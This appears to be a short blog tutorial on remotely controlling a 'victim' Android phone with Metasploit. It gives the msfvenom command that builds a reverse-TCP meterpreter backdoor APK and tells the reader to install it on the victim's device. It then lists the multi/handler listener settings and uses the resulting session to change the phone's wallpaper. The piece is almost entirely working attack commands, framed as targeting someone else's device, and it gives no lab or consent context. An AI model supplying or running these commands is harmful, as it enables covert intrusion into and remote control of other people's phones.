Ticker

6/recent/ticker-posts

How To Remotely Change Victim Android Wallpaper Screen With Kali

We are back with another Metasploit tutorial in which we going to show you how to remotely change the victim device wallpaper using Metasploit-framework. So if you are excited let's get started.

Requirements 

  • Metasploit-Framework
  • Internet Access
1. First of all we need to generate a backdoor app for android using the given command in the terminal.
msfvenom -p android/meterpreter/reverse_tcp lhost=<type host> lport=<type port> -o $HOME/Desktop/payload.apk


2. Now install it in the victim device and exploit it with the given commands.
use exploit multi/handler
set payload android/meterpreter/reverse_tcp
set lhost <type host>
set lport <type port>


3. Now background this session and use wallpaper manager using the given commands.
background
Now use wallpaper multi handler
use multi/manage/set_wallpaper
set session 1
set wallpaper_file <type image path>
run


Now after a few seconds, you can see the wallpaper changed.